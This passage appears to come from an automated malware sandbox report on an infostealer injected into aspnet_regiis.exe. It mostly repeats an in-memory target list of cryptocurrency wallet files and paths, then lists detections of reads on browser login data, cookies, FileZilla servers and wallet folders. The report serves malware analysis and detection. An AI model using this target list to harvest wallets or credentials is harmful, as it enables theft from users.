Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: aspnet_regiis.exe, 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: aspnet_regiis.exe, 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: aspnet_regiis.exe, 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: aspnet_regiis.exe, 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\app-store.json
                        Source: aspnet_regiis.exe, 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: aspnet_regiis.exe, 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: aspnet_regiis.exe, 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: aspnet_regiis.exe, 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: aspnet_regiis.exe, 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: aspnet_regiis.exe, 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: aspnet_regiis.exe, 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: aspnet_regiis.exe, 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\*.*
                        Tries to harvest and steal Bitcoin Wallet information
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                        Tries to harvest and steal ftp login credentials
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                        Tries to steal Crypto Currency Wallets
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
